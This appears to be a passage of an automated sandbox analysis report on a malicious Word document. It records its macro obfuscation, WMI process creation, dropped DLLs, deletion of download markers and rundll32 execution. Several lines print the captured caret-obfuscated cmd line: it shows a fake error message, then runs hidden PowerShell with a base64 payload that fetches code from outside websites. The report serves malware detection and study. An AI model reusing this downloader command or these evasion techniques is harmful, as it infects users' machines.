Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: ARCH_25_012021.doc	Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_			Name: Gusca95luq_

Obfuscated command line found

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FF00270ED3 push E0000000h; ret	5_2_000007FF00270FF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FF0027100A push E0000000h; ret	5_2_000007FF00270FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242D98 push 00242E25h; ret	7_2_00242E1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250020 push 00250058h; ret	7_2_00250050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00244038 push 00244064h; ret	7_2_0024405C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021A0B2 push 0021A0E0h; ret	7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021A0B4 push 0021A0E0h; ret	7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B274 push 0021B2CDh; ret	7_2_0021B2C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022C34C push 0022C378h; ret	7_2_0022C370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E450 push ecx; mov dword ptr [esp], edx	7_2_0021E454
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250498 push 002504EFh; ret	7_2_002504E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002504F4 push 0025055Ch; ret	7_2_00250554
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002505B8 push 002505E4h; ret	7_2_002505DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250580 push 002505ACh; ret	7_2_002505A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B588 push 0024B5CAh; ret	7_2_0024B5C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002505F0 push 0025063Ch; ret	7_2_00250634
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250654 push 00250680h; ret	7_2_00250678
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025068C push 002506B8h; ret	7_2_002506B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E696 push ecx; mov dword ptr [esp], edx	7_2_0021E69C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E6F0 push ecx; mov dword ptr [esp], edx	7_2_0021E6F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002506C4 push 002506F0h; ret	7_2_002506E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D6DC push 0021D751h; ret	7_2_0021D749
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218748 push 00218774h; ret	7_2_0021876C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E750 push ecx; mov dword ptr [esp], edx	7_2_0021E754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D754 push 0021D7ADh; ret	7_2_0021D7A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002537A8 push 002537E0h; ret	7_2_002537D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218798 push 002187C4h; ret	7_2_002187BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002507E4 push 00250827h; ret	7_2_0025081F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250834 push 00250860h; ret	7_2_00250858
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025086C push 00250898h; ret	7_2_00250890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00253848 push 00253874h; ret	7_2_0025386C

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Kizmwn\teeko.fjq

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Kizmwn\teeko.fjq:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
